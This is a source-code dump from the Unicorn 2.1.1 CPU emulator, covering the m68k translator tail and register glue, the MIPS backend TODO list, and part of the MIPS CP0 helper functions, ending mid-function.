INSN(intouch, f340, ffc0, CF_ISA_A); INSN(cpushl, 
f428, ff38, CF_ISA_A); INSN(cpush, f420, ff20, M68040); INSN(cinv, f400, ff20, M68040); INSN(pflush, f500, ffe0, M68040); INSN(ptest, f548, ffd8, M68040); INSN(wddata, fb00, ff00, CF_ISA_A); INSN(wdebug, fbc0, ffc0, CF_ISA_A); INSN(move16_mem, f600, ffe0, M68040); INSN(move16_reg, f620, fff8, M68040); #undef INSN } static void m68k_tr_init_disas_context(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); CPUM68KState *env = cpu->env_ptr; // unicorn setup dc->uc = cpu->uc; dc->env = env; dc->pc = dc->base.pc_first; dc->cc_op = CC_OP_DYNAMIC; dc->cc_op_synced = 1; dc->done_mac = 0; dc->writeback_mask = 0; init_release_array(dc); } static void m68k_tr_tb_start(DisasContextBase *dcbase, CPUState *cpu) { } static void m68k_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, dc->base.pc_next, dc->cc_op); } static bool m68k_tr_breakpoint_check(DisasContextBase *dcbase, CPUState *cpu, const CPUBreakpoint *bp) { DisasContext *dc = container_of(dcbase, DisasContext, base); gen_exception(dc, dc->base.pc_next, EXCP_DEBUG); /* * The address covered by the breakpoint must be included in * [tb->pc, tb->pc + tb->size) in order for it to be * properly cleared -- thus we increment the PC here so that * the logic setting tb->size below does the right thing. */ dc->base.pc_next += 2; return true; } static void m68k_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); struct uc_struct *uc = dc->uc; TCGContext *tcg_ctx = uc->tcg_ctx; CPUM68KState *env = cpu->env_ptr; uint16_t insn; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, dc->pc)) { gen_exception(dc, dc->pc, EXCP_HLT); return; } // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_CODE, dc->pc)) { // Sync PC in advance tcg_gen_movi_i32(tcg_ctx, QREG_PC, dc->pc); gen_uc_tracecode(tcg_ctx, 2, UC_HOOK_CODE_IDX, uc, dc->pc); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } insn = read_im16(env, dc); opcode_table[insn](env, dc, insn); do_writebacks(dc); do_release(dc); dc->base.pc_next = dc->pc; if (dc->base.is_jmp == DISAS_NEXT) { /* * Stop translation when the next insn might touch a new page. * This ensures that prefetch aborts at the right place. * * We cannot determine the size of the next insn without * completely decoding it. However, the maximum insn size * is 32 bytes, so end if we do not have that much remaining. * This may produce several small TBs at the end of each page, * but they will all be linked with goto_tb. * * ??? ColdFire maximum is 4 bytes; MC68000's maximum is also * smaller than MC68020's. */ target_ulong start_page_offset = dc->pc - (dc->base.pc_first & TARGET_PAGE_MASK); if (start_page_offset >= TARGET_PAGE_SIZE - 32) { dc->base.is_jmp = DISAS_TOO_MANY; } } } static void m68k_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *dc = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = dc->uc->tcg_ctx; switch (dc->base.is_jmp) { case DISAS_NORETURN: break; case DISAS_TOO_MANY: update_cc_op(dc); if (dc->base.singlestep_enabled) { tcg_gen_movi_i32(tcg_ctx, QREG_PC, dc->pc); gen_raise_exception(tcg_ctx, EXCP_DEBUG); } else { gen_jmp_tb(dc, 0, dc->pc); } break; case DISAS_JUMP: /* We updated CC_OP and PC in gen_jmp/gen_jmp_im.
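         * Nothing is left to synchronize, so either raise EXCP_DEBUG for
         * single-stepping or chain to the next TB via the lookup helper.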
*/ if (dc->base.singlestep_enabled) { gen_raise_exception(tcg_ctx, EXCP_DEBUG); } else { tcg_gen_lookup_and_goto_ptr(tcg_ctx); } break; case DISAS_EXIT: /* * We updated CC_OP and PC in gen_exit_tb, but also modified * other state that may require returning to the main loop. */ if (dc->base.singlestep_enabled) { gen_raise_exception(tcg_ctx, EXCP_DEBUG); } else { tcg_gen_exit_tb(tcg_ctx, NULL, 0); } break; default: g_assert_not_reached(); } } static const TranslatorOps m68k_tr_ops = { .init_disas_context = m68k_tr_init_disas_context, .tb_start = m68k_tr_tb_start, .insn_start = m68k_tr_insn_start, .breakpoint_check = m68k_tr_breakpoint_check, .translate_insn = m68k_tr_translate_insn, .tb_stop = m68k_tr_tb_stop, }; void gen_intermediate_code(CPUState *cpu, TranslationBlock *tb, int max_insns) { DisasContext dc; memset(&dc, 0, sizeof(dc)); translator_loop(&m68k_tr_ops, &dc.base, cpu, tb, max_insns); } #if 0 static double floatx80_to_double(CPUM68KState *env, uint16_t high, uint64_t low) { floatx80 a = { .high = high, .low = low }; union { float64 f64; double d; } u; u.f64 = floatx80_to_float64(a, &env->fp_status); return u.d; } #endif void restore_state_to_opc(CPUM68KState *env, TranslationBlock *tb, target_ulong *data) { int cc_op = data[1]; env->pc = data[0]; if (cc_op != CC_OP_DYNAMIC) { env->cc_op = cc_op; } }

unicorn-2.1.1/qemu/target/m68k/unicorn.c

/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "sysemu/cpus.h" #include "cpu.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" M68kCPU *cpu_m68k_init(struct uc_struct *uc); static void m68k_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUM68KState *)uc->cpu->env_ptr)->pc = address; } static uint64_t m68k_get_pc(struct uc_struct *uc) { return ((CPUM68KState *)uc->cpu->env_ptr)->pc; } static void m68k_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; M68kCPU *cpu = (M68kCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->aregs, 0, sizeof(env->aregs)); memset(env->dregs, 0, sizeof(env->dregs)); env->pc = 0; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUM68KState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >=
UC_M68K_REG_A0 && regid <= UC_M68K_REG_A7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->aregs[regid - UC_M68K_REG_A0]; } else if (regid >= UC_M68K_REG_D0 && regid <= UC_M68K_REG_D7) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->dregs[regid - UC_M68K_REG_D0]; } else { switch (regid) { default: break; case UC_M68K_REG_PC: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->pc; break; case UC_M68K_REG_SR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->sr; break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUM68KState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_M68K_REG_A0 && regid <= UC_M68K_REG_A7) { CHECK_REG_TYPE(uint32_t); env->aregs[regid - UC_M68K_REG_A0] = *(uint32_t *)value; } else if (regid >= UC_M68K_REG_D0 && regid <= UC_M68K_REG_D7) { CHECK_REG_TYPE(uint32_t); env->dregs[regid - UC_M68K_REG_D0] = *(uint32_t *)value; } else { switch (regid) { default: break; case UC_M68K_REG_PC: CHECK_REG_TYPE(uint32_t); env->pc = *(uint32_t *)value; *setpc = 1; break; case UC_M68K_REG_SR: CHECK_REG_TYPE(uint32_t); cpu_m68k_set_sr(env, *(uint32_t *)value); break; } } return ret; } static int m68k_cpus_init(struct uc_struct *uc, const char *cpu_model) { M68kCPU *cpu; cpu = cpu_m68k_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->release = m68k_release; uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = m68k_set_pc; uc->get_pc = m68k_get_pc; uc->cpus_init = m68k_cpus_init; uc->cpu_context_size = offsetof(CPUM68KState, end_reset_fields); uc_common_init(uc); }

unicorn-2.1.1/qemu/target/m68k/unicorn.h

/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ #ifndef UC_QEMU_TARGET_M68K_H #define UC_QEMU_TARGET_M68K_H // functions to read & write registers uc_err reg_read_m68k(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_m68k(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_m68k(struct uc_struct *uc); #endif
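/*
 * Note (assumption based on unicorn's per-target build setup): the
 * unsuffixed reg_read/reg_write/uc_init definitions in unicorn.c appear
 * to be mapped to these _m68k-suffixed names at build time via a
 * generated symbol-renaming header, which would explain why the
 * declarations here do not textually match the definitions.
 */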
unicorn-2.1.1/qemu/target/mips/
unicorn-2.1.1/qemu/target/mips/TODO

Unsolved issues/bugs in the mips/mipsel backend
-----------------------------------------------

General
-------
- Unimplemented ASEs:
  - MDMX
  - SmartMIPS
  - microMIPS DSP r1 & r2 encodings
- MT ASE only partially implemented and not functional
- Shadow register support only partially implemented,
  lacks set switching on interrupt/exception.
- 34K ITC not implemented.
- A general lack of documentation, especially for technical internals.
  Existing documentation is x86-centric.
- Reverse endianness bit not implemented
- The TLB emulation is very inefficient:
  QEMU's softmmu implements an x86-style MMU, with separate entries for
  read/write/execute, a TLB index which is just a modulo of the virtual
  address, and a set of TLBs for each user/kernel/supervisor MMU mode.
  MIPS has a single entry for read/write/execute and only one MMU mode.
  But it is fully associative with randomized entry indices, and uses up
  to 256 ASID tags as an additional matching criterion (which roughly
  equates to 256 MMU modes). It also has a global flag which causes
  entries to match regardless of ASID. To cope with these differences,
  QEMU currently flushes the TLB at each ASID change. Using the MMU
  modes to implement ASIDs hinges on implementing the global bit
  efficiently.
- save/restore of the CPU state is not implemented (see machine.c).

MIPS64
------
- Userland emulation (both n32 and n64) not functional.

"Generic" 4Kc system emulation
------------------------------
- Doesn't correspond to any real hardware. Should be removed some day,
  U-Boot is the last remaining user.

PICA 61 system emulation
------------------------
- No framebuffer support yet.

MALTA system emulation
----------------------
- We fake firmware support instead of doing the real thing
- Real firmware (YAMON) falls over when trying to init RAM, presumably
  due to lacking system controller emulation.
- Bonito system controller not implemented
- MSC1 system controller not implemented

unicorn-2.1.1/qemu/target/mips/cp0_helper.c

/* * Helpers for emulation of CP0-related MIPS instructions. * * Copyright (C) 2004-2005 Jocelyn Mayer * Copyright (C) 2020 Wave Computing, Inc. * Copyright (C) 2020 Aleksandar Markovic <amarkovic@wavecomp.com> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. * */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/memop.h" //#include "sysemu/kvm.h" /* SMP helpers. */ static bool mips_vpe_is_wfi(MIPSCPU *c) { CPUState *cpu = CPU(c); CPUMIPSState *env = &c->env; /* * If the VPE is halted but otherwise active, it means it's waiting for * an interrupt. */ return cpu->halted && mips_vpe_active(env); } #if 0 static bool mips_vp_is_wfi(MIPSCPU *c) { CPUState *cpu = CPU(c); CPUMIPSState *env = &c->env; return cpu->halted && mips_vp_active(env, cpu); } #endif static inline void mips_vpe_wake(MIPSCPU *c) { /* * Don't set ->halted = 0 directly, let it be done via cpu_has_work * because there might be other conditions that state that c should * be sleeping. */ cpu_interrupt(CPU(c), CPU_INTERRUPT_WAKE); } static inline void mips_vpe_sleep(MIPSCPU *cpu) { CPUState *cs = CPU(cpu); /* * The VPE was shut off, really go to bed. * Reset any old _WAKE requests. */ cs->halted = 1; cpu_reset_interrupt(cs, CPU_INTERRUPT_WAKE); } static inline void mips_tc_wake(MIPSCPU *cpu, int tc) { CPUMIPSState *c = &cpu->env; /* FIXME: TC reschedule. */ if (mips_vpe_active(c) && !mips_vpe_is_wfi(cpu)) { mips_vpe_wake(cpu); } } static inline void mips_tc_sleep(MIPSCPU *cpu, int tc) { CPUMIPSState *c = &cpu->env; /* FIXME: TC reschedule. */ if (!mips_vpe_active(c)) { mips_vpe_sleep(cpu); } } /** * mips_cpu_map_tc: * @env: CPU from which mapping is performed. * @tc: Should point to an int with the value of the global TC index. * * This function will transform @tc into a local index within the * returned #CPUMIPSState. */ /* * FIXME: This code assumes that all VPEs have the same number of TCs, * which depends on runtime setup. Can probably be fixed by * walking the list of CPUMIPSStates.
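 * Under that assumption the global TC index decomposes into
 * vpe_idx = tc / nr_threads plus a local index tc % nr_threads,
 * which is what the code below computes.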
*/ static CPUMIPSState *mips_cpu_map_tc(CPUMIPSState *env, int *tc) { CPUState *cs; // int vpe_idx; int tc_idx = *tc; if (!(env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP))) { /* Not allowed to address other CPUs. */ *tc = env->current_tc; return env; } cs = env_cpu(env); // vpe_idx = tc_idx / cs->nr_threads; *tc = tc_idx % cs->nr_threads; return env; #if 0 MIPSCPU *cpu; CPUState *other_cs; other_cs = qemu_get_cpu(vpe_idx); if (other_cs == NULL) { return env; } cpu = MIPS_CPU(other_cs); return &cpu->env; #endif } /* * The per VPE CP0_Status register shares some fields with the per TC * CP0_TCStatus registers. These fields are wired to the same registers, * so changes to either of them should be reflected on both registers. * * Also, EntryHi shares the bottom 8-bit ASID with TCStatus. * * These helper calls synchronize the regs for a given cpu. */ /* * Called for updates to CP0_Status. Defined in "cpu.h" for gdbstub.c. * static inline void sync_c0_status(CPUMIPSState *env, CPUMIPSState *cpu, * int tc); */ /* Called for updates to CP0_TCStatus. */ static void sync_c0_tcstatus(CPUMIPSState *cpu, int tc, target_ulong v) { uint32_t status; uint32_t tcu, tmx, tasid, tksu; uint32_t mask = ((1U << CP0St_CU3) | (1 << CP0St_CU2) | (1 << CP0St_CU1) | (1 << CP0St_CU0) | (1 << CP0St_MX) | (3 << CP0St_KSU)); tcu = (v >> CP0TCSt_TCU0) & 0xf; tmx = (v >> CP0TCSt_TMX) & 0x1; tasid = v & cpu->CP0_EntryHi_ASID_mask; tksu = (v >> CP0TCSt_TKSU) & 0x3; status = tcu << CP0St_CU0; status |= tmx << CP0St_MX; status |= tksu << CP0St_KSU; cpu->CP0_Status &= ~mask; cpu->CP0_Status |= status; /* Sync the TASID with EntryHi. */ cpu->CP0_EntryHi &= ~cpu->CP0_EntryHi_ASID_mask; cpu->CP0_EntryHi |= tasid; compute_hflags(cpu); } /* Called for updates to CP0_EntryHi. */ static void sync_c0_entryhi(CPUMIPSState *cpu, int tc) { int32_t *tcst; uint32_t asid, v = cpu->CP0_EntryHi; asid = v & cpu->CP0_EntryHi_ASID_mask; if (tc == cpu->current_tc) { tcst = &cpu->active_tc.CP0_TCStatus; } else { tcst = &cpu->tcs[tc].CP0_TCStatus; } *tcst &= ~cpu->CP0_EntryHi_ASID_mask; *tcst |= asid; } /* CP0 helpers */ target_ulong helper_mfc0_mvpcontrol(CPUMIPSState *env) { return env->mvp->CP0_MVPControl; } target_ulong helper_mfc0_mvpconf0(CPUMIPSState *env) { return env->mvp->CP0_MVPConf0; } target_ulong helper_mfc0_mvpconf1(CPUMIPSState *env) { return env->mvp->CP0_MVPConf1; } target_ulong helper_mfc0_random(CPUMIPSState *env) { return (int32_t)cpu_mips_get_random(env); } target_ulong helper_mfc0_tcstatus(CPUMIPSState *env) { return env->active_tc.CP0_TCStatus; } target_ulong helper_mftc0_tcstatus(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCStatus; } else { return other->tcs[other_tc].CP0_TCStatus; } } target_ulong helper_mfc0_tcbind(CPUMIPSState *env) { return env->active_tc.CP0_TCBind; } target_ulong helper_mftc0_tcbind(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCBind; } else { return other->tcs[other_tc].CP0_TCBind; } } target_ulong helper_mfc0_tcrestart(CPUMIPSState *env) { return env->active_tc.PC; } target_ulong helper_mftc0_tcrestart(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return
other->active_tc.PC; } else { return other->tcs[other_tc].PC; } } target_ulong helper_mfc0_tchalt(CPUMIPSState *env) { return env->active_tc.CP0_TCHalt; } target_ulong helper_mftc0_tchalt(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCHalt; } else { return other->tcs[other_tc].CP0_TCHalt; } } target_ulong helper_mfc0_tccontext(CPUMIPSState *env) { return env->active_tc.CP0_TCContext; } target_ulong helper_mftc0_tccontext(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCContext; } else { return other->tcs[other_tc].CP0_TCContext; } } target_ulong helper_mfc0_tcschedule(CPUMIPSState *env) { return env->active_tc.CP0_TCSchedule; } target_ulong helper_mftc0_tcschedule(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCSchedule; } else { return other->tcs[other_tc].CP0_TCSchedule; } } target_ulong helper_mfc0_tcschefback(CPUMIPSState *env) { return env->active_tc.CP0_TCScheFBack; } target_ulong helper_mftc0_tcschefback(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { return other->active_tc.CP0_TCScheFBack; } else { return other->tcs[other_tc].CP0_TCScheFBack; } } target_ulong helper_mfc0_count(CPUMIPSState *env) { // return (int32_t)cpu_mips_get_count(env); return 0; } target_ulong helper_mfc0_saar(CPUMIPSState *env) { if ((env->CP0_SAARI & 0x3f) < 2) { return (int32_t) env->CP0_SAAR[env->CP0_SAARI & 0x3f]; } return 0; } target_ulong helper_mfhc0_saar(CPUMIPSState *env) { if ((env->CP0_SAARI & 0x3f) < 2) { return env->CP0_SAAR[env->CP0_SAARI & 0x3f] >> 32; } return 0; } target_ulong helper_mftc0_entryhi(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_EntryHi; } target_ulong helper_mftc0_cause(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); int32_t tccause; CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { tccause = other->CP0_Cause; } else { tccause = other->CP0_Cause; } return tccause; } target_ulong helper_mftc0_status(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_Status; } target_ulong helper_mfc0_lladdr(CPUMIPSState *env) { return (int32_t)(env->CP0_LLAddr >> env->CP0_LLAddr_shift); } target_ulong helper_mfc0_maar(CPUMIPSState *env) { return (int32_t) env->CP0_MAAR[env->CP0_MAARI]; } target_ulong helper_mfhc0_maar(CPUMIPSState *env) { return env->CP0_MAAR[env->CP0_MAARI] >> 32; } target_ulong helper_mfc0_watchlo(CPUMIPSState *env, uint32_t sel) { return (int32_t)env->CP0_WatchLo[sel]; } target_ulong helper_mfc0_watchhi(CPUMIPSState *env, uint32_t sel) { return (int32_t) env->CP0_WatchHi[sel]; } target_ulong helper_mfhc0_watchhi(CPUMIPSState *env, uint32_t sel) { return env->CP0_WatchHi[sel] >> 32; } target_ulong helper_mfc0_debug(CPUMIPSState *env) { target_ulong t0 = env->CP0_Debug; if (env->hflags & 
MIPS_HFLAG_DM) { t0 |= 1 << CP0DB_DM; } return t0; } target_ulong helper_mftc0_debug(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); int32_t tcstatus; CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { tcstatus = other->active_tc.CP0_Debug_tcstatus; } else { tcstatus = other->tcs[other_tc].CP0_Debug_tcstatus; } /* XXX: Might be wrong, check with EJTAG spec. */ return (other->CP0_Debug & ~((1 << CP0DB_SSt) | (1 << CP0DB_Halt))) | (tcstatus & ((1 << CP0DB_SSt) | (1 << CP0DB_Halt))); } #if defined(TARGET_MIPS64) target_ulong helper_dmfc0_tcrestart(CPUMIPSState *env) { return env->active_tc.PC; } target_ulong helper_dmfc0_tchalt(CPUMIPSState *env) { return env->active_tc.CP0_TCHalt; } target_ulong helper_dmfc0_tccontext(CPUMIPSState *env) { return env->active_tc.CP0_TCContext; } target_ulong helper_dmfc0_tcschedule(CPUMIPSState *env) { return env->active_tc.CP0_TCSchedule; } target_ulong helper_dmfc0_tcschefback(CPUMIPSState *env) { return env->active_tc.CP0_TCScheFBack; } target_ulong helper_dmfc0_lladdr(CPUMIPSState *env) { return env->CP0_LLAddr >> env->CP0_LLAddr_shift; } target_ulong helper_dmfc0_maar(CPUMIPSState *env) { return env->CP0_MAAR[env->CP0_MAARI]; } target_ulong helper_dmfc0_watchlo(CPUMIPSState *env, uint32_t sel) { return env->CP0_WatchLo[sel]; } target_ulong helper_dmfc0_watchhi(CPUMIPSState *env, uint32_t sel) { return env->CP0_WatchHi[sel]; } target_ulong helper_dmfc0_saar(CPUMIPSState *env) { if ((env->CP0_SAARI & 0x3f) < 2) { return env->CP0_SAAR[env->CP0_SAARI & 0x3f]; } return 0; } #endif /* TARGET_MIPS64 */ void helper_mtc0_index(CPUMIPSState *env, target_ulong arg1) { uint32_t index_p = env->CP0_Index & 0x80000000; uint32_t tlb_index = arg1 & 0x7fffffff; if (tlb_index < env->tlb->nb_tlb) { if (env->insn_flags & ISA_MIPS32R6) { index_p |= arg1 & 0x80000000; } env->CP0_Index = index_p | tlb_index; } } void helper_mtc0_mvpcontrol(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = 0; uint32_t newval; if (env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) { mask |= (1 << CP0MVPCo_CPA) | (1 << CP0MVPCo_VPC) | (1 << CP0MVPCo_EVP); } if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) { mask |= (1 << CP0MVPCo_STLB); } newval = (env->mvp->CP0_MVPControl & ~mask) | (arg1 & mask); /* TODO: Enable/disable shared TLB, enable/disable VPEs. */ env->mvp->CP0_MVPControl = newval; } void helper_mtc0_vpecontrol(CPUMIPSState *env, target_ulong arg1) { uint32_t mask; uint32_t newval; mask = (1 << CP0VPECo_YSI) | (1 << CP0VPECo_GSI) | (1 << CP0VPECo_TE) | (0xff << CP0VPECo_TargTC); newval = (env->CP0_VPEControl & ~mask) | (arg1 & mask); /* * Yield scheduler intercept not implemented. * Gating storage scheduler intercept not implemented. */ /* TODO: Enable/disable TCs. */ env->CP0_VPEControl = newval; } void helper_mttc0_vpecontrol(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); uint32_t mask; uint32_t newval; mask = (1 << CP0VPECo_YSI) | (1 << CP0VPECo_GSI) | (1 << CP0VPECo_TE) | (0xff << CP0VPECo_TargTC); newval = (other->CP0_VPEControl & ~mask) | (arg1 & mask); /* TODO: Enable/disable TCs. */ other->CP0_VPEControl = newval; } target_ulong helper_mftc0_vpecontrol(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); /* FIXME: Mask away return zero on read bits. 
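     * Some VPEControl bits are architecturally read-as-zero; they are
     * currently returned unmasked.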
*/ return other->CP0_VPEControl; } target_ulong helper_mftc0_vpeconf0(CPUMIPSState *env) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); return other->CP0_VPEConf0; } void helper_mtc0_vpeconf0(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = 0; uint32_t newval; if (env->CP0_VPEConf0 & (1 << CP0VPEC0_MVP)) { if (env->CP0_VPEConf0 & (1 << CP0VPEC0_VPA)) { mask |= (0xff << CP0VPEC0_XTC); } mask |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); } newval = (env->CP0_VPEConf0 & ~mask) | (arg1 & mask); /* TODO: TC exclusive handling due to ERL/EXL. */ env->CP0_VPEConf0 = newval; } void helper_mttc0_vpeconf0(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); uint32_t mask = 0; uint32_t newval; mask |= (1 << CP0VPEC0_MVP) | (1 << CP0VPEC0_VPA); newval = (other->CP0_VPEConf0 & ~mask) | (arg1 & mask); /* TODO: TC exclusive handling due to ERL/EXL. */ other->CP0_VPEConf0 = newval; } void helper_mtc0_vpeconf1(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = 0; uint32_t newval; if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) mask |= (0xff << CP0VPEC1_NCX) | (0xff << CP0VPEC1_NCP2) | (0xff << CP0VPEC1_NCP1); newval = (env->CP0_VPEConf1 & ~mask) | (arg1 & mask); /* UDI not implemented. */ /* CP2 not implemented. */ /* TODO: Handle FPU (CP1) binding. */ env->CP0_VPEConf1 = newval; } void helper_mtc0_yqmask(CPUMIPSState *env, target_ulong arg1) { /* Yield qualifier inputs not implemented. */ env->CP0_YQMask = 0x00000000; } void helper_mtc0_vpeopt(CPUMIPSState *env, target_ulong arg1) { env->CP0_VPEOpt = arg1 & 0x0000ffff; } #define MTC0_ENTRYLO_MASK(env) ((env->PAMask >> 6) & 0x3FFFFFFF) void helper_mtc0_entrylo0(CPUMIPSState *env, target_ulong arg1) { /* 1k pages not implemented */ target_ulong rxi = arg1 & (env->CP0_PageGrain & (3u << CP0PG_XIE)); env->CP0_EntryLo0 = (arg1 & MTC0_ENTRYLO_MASK(env)) | (rxi << (CP0EnLo_XI - 30)); } #if defined(TARGET_MIPS64) #define DMTC0_ENTRYLO_MASK(env) (env->PAMask >> 6) void helper_dmtc0_entrylo0(CPUMIPSState *env, uint64_t arg1) { uint64_t rxi = arg1 & ((env->CP0_PageGrain & (3ull << CP0PG_XIE)) << 32); env->CP0_EntryLo0 = (arg1 & DMTC0_ENTRYLO_MASK(env)) | rxi; } #endif void helper_mtc0_tcstatus(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = env->CP0_TCStatus_rw_bitmask; uint32_t newval; newval = (env->active_tc.CP0_TCStatus & ~mask) | (arg1 & mask); env->active_tc.CP0_TCStatus = newval; sync_c0_tcstatus(env, env->current_tc, newval); } void helper_mttc0_tcstatus(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other_tc == other->current_tc) { other->active_tc.CP0_TCStatus = arg1; } else { other->tcs[other_tc].CP0_TCStatus = arg1; } sync_c0_tcstatus(other, other_tc, arg1); } void helper_mtc0_tcbind(CPUMIPSState *env, target_ulong arg1) { uint32_t mask = (1 << CP0TCBd_TBE); uint32_t newval; if (env->mvp->CP0_MVPControl & (1 << CP0MVPCo_VPC)) { mask |= (1 << CP0TCBd_CurVPE); } newval = (env->active_tc.CP0_TCBind & ~mask) | (arg1 & mask); env->active_tc.CP0_TCBind = newval; } void helper_mttc0_tcbind(CPUMIPSState *env, target_ulong arg1) { int other_tc = env->CP0_VPEControl & (0xff << CP0VPECo_TargTC); uint32_t mask = (1 << CP0TCBd_TBE); uint32_t newval; CPUMIPSState *other = mips_cpu_map_tc(env, &other_tc); if (other->mvp->CP0_MVPControl & (1 << 
